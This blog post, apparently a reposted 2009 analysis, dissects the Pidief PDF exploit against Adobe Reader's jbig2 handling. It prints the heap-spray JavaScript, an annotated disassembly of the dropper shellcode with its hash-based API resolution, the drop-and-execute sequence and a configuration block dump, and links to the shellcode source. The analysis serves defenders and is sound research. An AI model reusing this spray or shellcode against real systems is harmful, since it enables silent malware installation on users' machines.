getfile size shellcode
Reversing | 2011. 5. 14. 12:32
I want to present the results of my analysis of the Adobe PDF exploit from March 2009. It allows execution of arbitrary Win32 code through a bug in the handling of jbig2 compression. So far (as of 3rd March 2009) the bug has only been fixed internally, but Adobe plans to provide an update on March 11th. All Adobe Reader versions since 2007 are vulnerable (Adobe Reader 7.0 and higher are affected). The percentage of exploiting PDFs that use this bug is very low; it is not widespread.
Overview of the PDF file
So let's give an overview of what an exploiting PDF file contains:
- JavaScript Code, making the exploit possible
- Shellcode integrated in the JavaScript Code (loading the stream)
- Exploit Code, a Stream in the PDF file containing the encrypted executable (malware)
- Fake PDF content, to hide its malicious intention
There are three main parts to an exploiting PDF: the JavaScript Code, the Shellcode and the Exploit Code. All are equally important for the exploit to work.
A well-known and widespread virus family is Pidief (also the virus analysed here). Over its history it has used various exploits in Adobe PDFs to execute malware. The following analysis focuses on the current version of Pidief. Enjoy!
JavaScript Code
Pidief first of all contains JavaScript code, stored as a JavaScript object in the PDF file. The script is octal-encoded and looks like this:
2 0 obj <</S /JavaScript /JS (\040\012\012\040\040\040\040\040\040\040\040\146\165\156\143\164\151\157\156\040\160\162\151\156\164\111\156\146\157\050\051\173\012\040\040\040\040\040\040\040\040\040\040\040\040\143\157\156\163\157\154\145\056\160\162\151\156\164\154\156\050\042\126\151\145\167\145\162\040\154\141\156\147\165\141\147\145\072\040\042\040\053\040\141\160\160\056\154\141\156\147\165\141\147\145\051\073\012\040\040\040\040\040\040\040\040\040\040\040\040\143\157\156\163\157\154\145\056\160\162\151\156\164\154\156\050\042\126\151\145\167\145\162\040\166\1 ... >> endobj
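The octal escapes in the object above can be turned back into readable text with a few lines of Python. This is a minimal sketch for analysis purposes; the function name decode_octal_escapes is hypothetical, and it only handles the \ooo form seen here, not the other PDF string escapes such as \n or \(.

```python
import re

# A PDF literal string may write any byte as a backslash followed by
# one to three octal digits (for example \146 is the letter "f").
OCTAL_ESCAPE = re.compile(rb"\\([0-7]{1,3})")


def decode_octal_escapes(raw: bytes) -> bytes:
    """Replace every backslash-octal escape with the byte it encodes."""
    return OCTAL_ESCAPE.sub(
        lambda m: bytes([int(m.group(1), 8) & 0xFF]), raw
    )


# A short run of escapes copied from the script object above.
sample = (
    rb"\146\165\156\143\164\151\157\156\040"
    rb"\160\162\151\156\164\111\156\146\157\050\051\173"
)
print(decode_octal_escapes(sample).decode("latin-1"))
```

Run on the escapes shown, this prints the first line of the script, function printInfo(){.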
The script is quite big: decoded, it is 42792 bytes long (although most of it is the Shellcode). Before showing the decoded JavaScript code, I want to briefly explain how JavaScript is executed in PDFs. Adobe uses its own internal engine, so for everyone who is thinking of IE: nope. JavaScript is executed on certain actions (triggers). A German document from Adobe says there are 7 actions that can execute JavaScript; the first one, Open Document, is used here. This is an important limitation: JavaScript execution in a PDF depends on actions. The following code registers the JavaScript to be executed when the document is opened:
3 0 obj <</Type /Catalog /Outlines 4 0 R /Pages 5 0 R /OpenAction 2 0 R >> endobj
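For triage, the object that an /OpenAction entry refers to can be located with a regular expression. The following is only a sketch: the name find_open_action is hypothetical, and it assumes the action is given as an indirect reference in uncompressed, unobfuscated form, as in the catalog object above. Real files may use inline dictionaries, object streams or escaped names, which this does not handle.

```python
import re

# Matches "/OpenAction <object number> <generation> R" in raw PDF bytes.
OPEN_ACTION_RE = re.compile(rb"/OpenAction\s+(\d+)\s+(\d+)\s+R")


def find_open_action(pdf_bytes: bytes):
    """Return (object number, generation) of the OpenAction target, or None."""
    match = OPEN_ACTION_RE.search(pdf_bytes)
    if match is None:
        return None
    return int(match.group(1)), int(match.group(2))


catalog = (
    b"3 0 obj <</Type /Catalog /Outlines 4 0 R /Pages 5 0 R "
    b"/OpenAction 2 0 R >> endobj"
)
print(find_open_action(catalog))
```

For the catalog shown, the result is the pair (2, 0).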
OpenAction tells the reader to execute the object referenced as 2 0 (compare with the script object above). The original JavaScript code (shown octal-encoded above):
function printInfo(){
    console.println("Viewer language: " + app.language);
    console.println("Viewer version: " + app.viewerVersion);
    console.println("Viewer Type: " + app.viewerType);
    console.println("Viewer Variatio: " + app.viewerVariation);
    console.println("Dumping all data objects in the document.");
    if ( this.external ) {
        console.println("viewing from a browser.");
    } else {
        console.println("viewing in the Acrobat application.");
    }
    ...
The script contains just two functions: printInfo() and sprayWindows(). The first only prints information about the PDF viewer (for debugging); the second prepares the memory and places the Shellcode into it. The script is about 42 KB long but has only 150 lines, which makes it easy to read. Interestingly, the JavaScript code also contains comments:
// Create a 1MB string of NOP instructions followed by shellcode:
//
// malloc header   string length   NOP slide   shellcode   NULL terminator
// 32 bytes        4 bytes         x bytes     y bytes     2 bytes
while (pointers.length <= 0x100000/2) pointers += pointers;
//Pointers
pointers = pointers.substring(0, 0x100000/2 - 32/2 - 4/2 - pointers1.length - 2/2 );
while (nop.length <= 0x100000/2) nop += nop;
//Trampolin
nop = nop.substring(0, 0x100000/2 - 32/2 - 4/2 - jmp.length - 2/2);
// while (nop1.length <= 0x100000/2)
//     nop1 += nop1;
//shelcode <1M
// nop1 = nop1.substring(0, 0x100000/2 - 32/2 - 4/2 - shellcode.length - 2/2 );
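The arithmetic in the substring() calls above is easier to follow when written out. The sketch below only reproduces the size calculation from the script's own comment (32-byte malloc header, 4-byte length field, 2-byte terminator, two bytes per JavaScript character); the function names and the tail length of 400 characters are hypothetical values chosen for illustration.

```python
BLOCK_BYTES = 0x100000   # 1 MB per string, from the comment in the script
MALLOC_HEADER = 32       # bytes, from the comment
LENGTH_FIELD = 4         # bytes, from the comment
TERMINATOR = 2           # bytes, from the comment
BYTES_PER_CHAR = 2       # JavaScript strings use 16-bit code units


def filler_chars(tail_chars: int) -> int:
    """Characters left for the repeated filler once the tail is reserved."""
    return (BLOCK_BYTES // 2 - MALLOC_HEADER // 2 - LENGTH_FIELD // 2
            - tail_chars - TERMINATOR // 2)


def block_bytes(tail_chars: int) -> int:
    """Total bytes of one block: header, length, characters, terminator."""
    chars = filler_chars(tail_chars) + tail_chars
    return MALLOC_HEADER + LENGTH_FIELD + chars * BYTES_PER_CHAR + TERMINATOR


tail = 400  # hypothetical tail length in characters
print(filler_chars(tail), hex(block_bytes(tail)))
```

Whatever the tail length, the total comes out at exactly 0x100000 bytes, which is the point of the subtraction: every string fills one 1 MB allocation.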
How the Exploit works
As always, the PDF exploit works by exploiting a bug in the software (Adobe Reader). A common technique is, for example, the "Buffer Overflow": overflowing a buffer on the stack in order to overwrite return addresses so that they point to data. This is also used here, in connection with a bug in jbig2 compression. The JavaScript code allocates 200 MB and fills it with NOPs (no operation, an assembly opcode) and the Shellcode. The bug in jbig2 compression then causes execution to continue somewhere inside the 200 MB buffer. This is why there are so many NOPs: the exact entry point may differ, so the NOPs are executed until the Shellcode is reached. Here is the code that allocates the 200 MB:
var x = new Array();
// Fill 200MB of memory with copies of the NOP slide and shellcode
for (i = 0; i < 150; i++) {
    x[i] = nop+shellcode;
}
// x[i++] = nop1+shellcode;
for (; i < 201; i++) {
    x[i] = pointers + pointers1;
}
Interestingly, there is different code for Adobe Reader 9 and for Adobe Reader 7.0 and higher, so that the exploit works on different versions:
if(app.viewerVersion>=7.0&app.viewerVersion<9) {
Shellcode
The JavaScript code places the Shellcode in memory so that it gets executed through the bug in Adobe Reader. The Shellcode itself is valid Win32 code, stored in escaped form in the JavaScript. Here we leave the JavaScript engine and enter Windows. The first 4 bytes of the Shellcode are the abbreviation "JBIA", which decodes to 4 valid but junk instructions at the beginning. So let's recall the goal of the Shellcode: to extract and execute the two executables from the PDF. Let's take a look at the initial code:
; [junk code] - "JBIA"
00000000 4A               dec edx
00000001 42               inc edx
00000002 49               dec ecx
00000003 41               inc ecx
; create data on stack (284 bytes)
00000004 81EC20010000     sub esp,288
0000000A 8BFC             mov edi,esp
0000000C 83C704           add edi,4                          ; edi is a pointer to the new allocated data
; store the hashes of Windows API functions for later usage
0000000F C7073274910C     mov dword [edi],0xc917432          ; LoadLibraryA
00000015 C747048E130AAC   mov dword [edi+0x4],0xac0a138e     ; GetFileSize
0000001C C7470839E27D83   mov dword [edi+0x8],0x837de239     ; GetTempPathA
00000023 C7470C8FF21861   mov dword [edi+0xc],0x6118f28f     ; TerminateProcess
0000002A C747109332E494   mov dword [edi+0x10],0x94e43293    ; CreateFileA
00000031 C74714A932E494   mov dword [edi+0x14],0x94e432a9    ; CreateFileW
00000038 C7471843BEACDB   mov dword [edi+0x18],0xdbacbe43    ; SetFilePointer
0000003F C7471CB2360F13   mov dword [edi+0x1c],0x130f36b2    ; ReadFile
00000046 C74720C48D1F74   mov dword [edi+0x20],0x741f8dc4    ; WriteFile
0000004D C74724512FA201   mov dword [edi+0x24],0x1a22f51     ; WinExec
00000054 C7472857660DFF   mov dword [edi+0x28],0xff0d6657    ; CloseHandle
0000005B C7472C9B878BE5   mov dword [edi+0x2c],0xe58b879b    ; GetCommandLineA
00000062 C74730EDAFFFB4   mov dword [edi+0x30],0xb4ffafed    ; GetModuleFileNameA
; call the code following this instruction
00000069 E997020000       jmp dword Execute_Function
..
Execute_Function:
00000305 E864FDFFFF       call Execute_Shellcode             ; just for obfuscation, this will never return
So what happens here is that the function name hashes are stored on the stack and a cheap obfuscation call is made. The jmp instruction jumps to a call that calls the code following the jmp instruction, so you could remove both the jmp and the call instruction and it would have the same effect. At the very beginning, the code resolves its hashes to function addresses:
Execute_Shellcode:
; Arguments:
;   edi = pointer to the data/code stored on stack
0000006E 64A130000000     mov eax,[fs:0x30]     ; get a pointer to the Process Environment Block
00000074 8B400C           mov eax,[eax+12]      ; get a pointer to PEB_LDR_DATA structure
00000077 8B701C           mov esi,[eax+28]      ; -> PEB_LDR_DATA.InInitializationOrderModuleList.LDR_DATA_TABLE_ENTRY/LDR_MODULE (UNDOCUMENTED)
0000007A AD               lodsd                 ; double linked list, Forward link, to LDR_DATA_TABLE_ENTRY / LDR_MODULE structure (UNDOCUMENTED)
0000007B 8B6808           mov ebp,[eax+8]       ; DllBase (Module Base Address) (UNDOCUMENTED)
; resolve the 13 function hashes
0000007E 8BF7             mov esi,edi           ; esi points to the first hash to resolve
00000080 6A0D             push byte 13          ; loop 13 times
00000082 59               pop ecx               ; ecx is counter
Resolve_Hashes:
00000083 E838020000       call dword ResolveImportsByHashes
00000088 E2F9             loop Resolve_Hashes
ResolveImportsByHashes:
; resolves function hashes
;   ebp = Module Address
;   edi = pointer to hash to resolve and exchange with functions address
; store register contents
000002C0 51               push ecx
000002C1 56               push esi
000002C2 8B753C           mov esi,[ebp+0x3C]        ; -> PE Header (skip DOS Header)
000002C5 8B742E78         mov esi,[esi+ebp+0x78]    ; Export Table Virtual Address
000002C9 03F5             add esi,ebp               ; (absolute address)
000002CB 56               push esi                  ; store address of Export Directory Table
000002CC 8B7620           mov esi,[esi+0x20]        ; Name Pointer RVA (list of all functions)
000002CF 03F5             add esi,ebp               ; (absolute address)
000002D1 33C9             xor ecx,ecx
000002D3 49               dec ecx                   ; ecx is name counter
Function_Name_loop:
000002D4 41               inc ecx                   ; -> next function name
000002D5 AD               lodsd                     ; get the address of the function name
000002D6 03C5             add eax,ebp               ; (absolute address)
000002D8 33DB             xor ebx,ebx               ; reset next hash to generate
Generate_Hash_of_Function_Name:
000002DA 0FBE10           movsx edx,byte [eax]      ; load next character
000002DD 3AD6             cmp dl,dh                 ; zero terminator?
000002DF 7408             jz Generated_Hash
000002E1 C1CB07           ror ebx,7                 ; => this is the hash generating algorithm: hash = ror(hash, 7) + char
000002E4 03DA             add ebx,edx               ; (add the character to the rotated hash)
000002E6 40               inc eax                   ; -> next character
000002E7 EBF1             jmp short Generate_Hash_of_Function_Name
Generated_Hash:
000002E9 3B1F             cmp ebx,[edi]             ; matches the input hash with generated one?
000002EB 75E7             jnz Function_Name_loop    ; if not compare against next function
000002ED 5E               pop esi                   ; restore address of Export Directory Table
000002EE 8B5E24           mov ebx,[esi+0x24]        ; Ordinal Table
000002F1 03DD             add ebx,ebp               ; (absolute address)
000002F3 668B0C4B         mov cx,[ebx+ecx*2]        ; look up the function in the Ordinal Table to get the ordinal number
000002F7 8B5E1C           mov ebx,[esi+0x1c]        ; Export Address Table
000002FA 03DD             add ebx,ebp               ; (absolute address)
000002FC 8B048B           mov eax,[ebx+ecx*4]       ; -> look up the Address of the function (ordinal number in EAT)
000002FF 03C5             add eax,ebp               ; (absolute address)
00000301 AB               stosd                     ; overwrite the input hash with the address
; restore register contents
00000302 5E               pop esi
00000303 59               pop ecx
00000304 C3               ret
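The hash loop at 2DAh to 2E7h (rotate the running hash right by 7 bits, then add the next character) can be reproduced outside the shellcode to check which API name belongs to which constant. This is a minimal sketch of that loop; the names ror32 and name_hash are hypothetical, and it assumes plain ASCII export names, for which the sign extension done by movsx makes no difference.

```python
def ror32(value: int, count: int) -> int:
    """Rotate a 32-bit value right by count bits."""
    value &= 0xFFFFFFFF
    return ((value >> count) | (value << (32 - count))) & 0xFFFFFFFF


def name_hash(name: str) -> int:
    """hash = ror(hash, 7) + char for every character, truncated to 32 bits."""
    h = 0
    for byte in name.encode("ascii"):
        h = (ror32(h, 7) + byte) & 0xFFFFFFFF
    return h


print(hex(name_hash("WinExec")))
```

For "WinExec" this gives 0x1a22f51, the constant stored at [edi+0x24] in the initial code, so the other twelve constants can be checked the same way against a list of Kernel32 export names.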
This is the typical ResolveImportsByHashes function found in a lot of malware; compare it with Sinowal. And like many such resolve functions, it uses a ror 7 to generate the hash (very typical). The rest of the code is not that exciting, just standard API calls. As in the Sinowal analysis, I do not want to spam you with code, so here is the list of calls:
Kernel32!GetFileSize(FileHandle +4, NULL);
    done in a loop, to get the size of every file and compare it with the fixed PDF file size, in order to find the file handle of the PDF file
Kernel32!GetTempPathA(Stack Buffer, 256 bytes);
    returns the temp path, where the 2 executables will be stored
    "\SVCHOST.EXE" is then appended to the temp path
Kernel32!CreateFileA("C:\Windows\Temp\SVCHOST.EXE", GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL);
    creates the first file in the temp path
Kernel32!SetFilePointer(PDF File Handle, File Position = where the string is, NULL, FILE_BEGIN);
    sets the file pointer in the PDF file to a special configuration block
Kernel32!ReadFile(PDF File Handle, Buffer, 48 Bytes, &NumberOfBytesRead, NULL);
    reads the configuration block (30h bytes)
Kernel32!SetFilePointer(PDF File Handle, File Position, NULL, FILE_BEGIN);
    sets the file pointer to the position of the file to extract in the PDF file, taken from the configuration block
Kernel32!ReadFile(PDF File Handle, Buffer, 1024 Bytes, &NumberOfBytesRead, NULL);
Kernel32!WriteFile(PDF File Handle, Read File Buffer, 1024 Bytes, &NumberOfBytesWritten, NULL);
    both done in a loop to read the whole first file
    directly after each read, the buffer is decrypted with xor 97h
Kernel32!CloseHandle(Created File);
Kernel32!WinExec(Created File Name, 0);
    the malware is executed
strcat(Temp Path, "\temp.exe");
    the second file's name is temp.exe
Kernel32!CreateFileA(Second File Name, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL);
    also created in the temp directory
Kernel32!SetFilePointer(PDF File Handle, File Position = somewhere in the file, NULL, FILE_BEGIN);
    this time the file position is hard-coded
Kernel32!ReadFile(PDF File Handle, Buffer, 1024 Bytes, &NumberOfBytesRead, NULL);
Kernel32!WriteFile(PDF File Handle, Read File Buffer, 1024 Bytes, &NumberOfBytesWritten, NULL);
    again both done in a loop to read the whole second file
    directly after each read, the buffer is decrypted, this time with xor A0h
Kernel32!SetFilePointer(Created File Handle, File Position = 9000h, NULL, FILE_BEGIN);
    the file pointer of the second file is moved to that position
Kernel32!WriteFile(PDF File Handle, previously read configuration buffer, 40 Bytes, &NumberOfBytesWritten, NULL);
    and the configuration block is written
Kernel32!CloseHandle(Created File);
Kernel32!WinExec(Created Second File Name, 0);
    this file is executed as well
Kernel32!CloseHandle(Created File);
    ** programming error with this call, which makes the process crash
Kernel32!TerminateProcess(Current Process, Exit Code = 0);
    will never be executed, but should smoothly terminate Adobe Reader
...and that's it!
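The "decryption" mentioned in the list is a single-byte XOR over each buffer, with key 97h for the first file and A0h for the second. For an analyst who has already carved the embedded data out of a sample, the same operation can be sketched as follows; the function name xor_decode is hypothetical and the two input bytes are constructed for illustration, not taken from the sample.

```python
def xor_decode(data: bytes, key: int) -> bytes:
    """XOR every byte of data with the same one-byte key."""
    return bytes(b ^ key for b in data)


# "MZ", the signature at the start of every Windows executable, looks
# like DA CD once it has been XORed with 97h.
encoded = bytes([0xDA, 0xCD])
print(xor_decode(encoded, 0x97))
```

Because XOR is its own inverse, the same function encodes and decodes, which makes a decoded buffer starting with MZ a quick check that the right key and offset were used.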
Configuration Block
As mentioned, the PDF file contains a configuration block of 40 bytes (although the shellcode reads 48 bytes, 30h, which is what the dump below shows). The shellcode uses two values from it: where the first file lies in the PDF and how long it is. Furthermore, the configuration block is copied into the second file. The configuration block is hard-wired at position 171984 in the PDF file and contains the following bytes:
00029FD0  41 41 49 20 41 4D 4F 53 20 31 31 2D 30 32 2D 30  AAI AMOS 11-02-0
00029FE0  39 2E 70 64 66 00 00 74 00 78 78 78 78 78 78 78  9.pdf..t.xxxxxxx
00029FF0  78 78 78 78 78 78 78 78 C8 B0 04 00 FC 47 03 00  xxxxxxxxÈ°..üG..
The next-to-last dword, 0004B0C8, is the target primary file size (307400 bytes). The last dword, 000347FC, is the position of the file within the PDF file, but 0x2a000 and 0xb000 are added at runtime to get the actual position.
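The two dwords can be read straight out of the dump with Python's struct module. The sketch below uses the 48 bytes exactly as dumped; the function name parse_config and the labels name, size and offset are hypothetical, since the article only describes the last two dwords and the meaning of the bytes in between is not known. The runtime adjustment of the position is deliberately not applied.

```python
import struct

# The 48 bytes of the configuration block, copied from the dump.
CONFIG_BLOCK = bytes.fromhex(
    "41 41 49 20 41 4D 4F 53 20 31 31 2D 30 32 2D 30 "
    "39 2E 70 64 66 00 00 74 00 78 78 78 78 78 78 78 "
    "78 78 78 78 78 78 78 78 C8 B0 04 00 FC 47 03 00"
)


def parse_config(block: bytes):
    """Return (leading string, next-to-last dword, last dword)."""
    # The block starts with a zero-terminated ASCII string.
    name = block.split(b"\x00", 1)[0].decode("ascii")
    # The last 8 bytes are two little-endian 32-bit values.
    size, offset = struct.unpack_from("<II", block, len(block) - 8)
    return name, size, offset


name, size, offset = parse_config(CONFIG_BLOCK)
print(name, size, hex(offset))
```

This yields the string AAI AMOS 11-02-09.pdf, a size of 307400 and a raw position value of 0x347fc, matching the values read off the dump by hand.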
Programming Errors in Pidief
I encountered various bugs in the Shellcode of Pidief:
- Address 6Eh: direct access to the Process Environment Block and LDR data structures; they are subject to change and differ between Windows XP, Server 2003 and Vista, undefined behaviour
- Address BBh: the loop condition results in an endless loop if the PDF file size != 827116, forcing the system to crash
- Address C0h: only 256 bytes are allocated for the file name, but Windows defines MAX_PATH as 260, 4 ("C:\", 0) + 256 (file name); this could lead to undefined behaviour and a system crash if the PDF file name is > 260 characters long
- Address 2B7h: GetFileSize is called instead of GetCurrentProcess, THIS IN FACT CRASHES YOUR ADOBE READER
- Address 2E7h, function ResolveImportsByHashes: endless loop if the searched function does not exist in the dll, undefined behaviour
Also, the code is not very efficient and could have been written better. It contains junk instructions and redundant code.
Affected Systems
All Windows XP systems with Adobe Reader 7.0 or higher, in a version from before March 11 2009, are affected. March 11 because that is the day on which Adobe Systems wants to release a security fix for Adobe Reader. Furthermore, JavaScript must be enabled in Adobe Reader (which it is by default). In the link below, Adobe Systems explains how to deactivate it in the preferences.
I cannot currently say whether Vista is affected too. I am not sure, because the Process Environment Block and LDR data structures are used, which change heavily from one Windows version to the next. It has also not been covered yet what the malware executables do and whether they are Vista compatible; I'll review that later.
Downloads
Download the Pidief Shellcode from http://web17.webbpro.de/downloads/PDF Exploit Article/Shellcode.asm. The terms of use apply to the provided code. For any other information or files, please send me a request.
Conclusion
PDF exploits are quite nice, but also difficult to find. As a virus writer you would need to take a very close look at Adobe Reader to find one, but once found, it is worth a few thousand euro (up to 10.000 € on the market). As an end user, remember to always keep your Adobe Reader updated (use the latest version) and turn automatic updates on.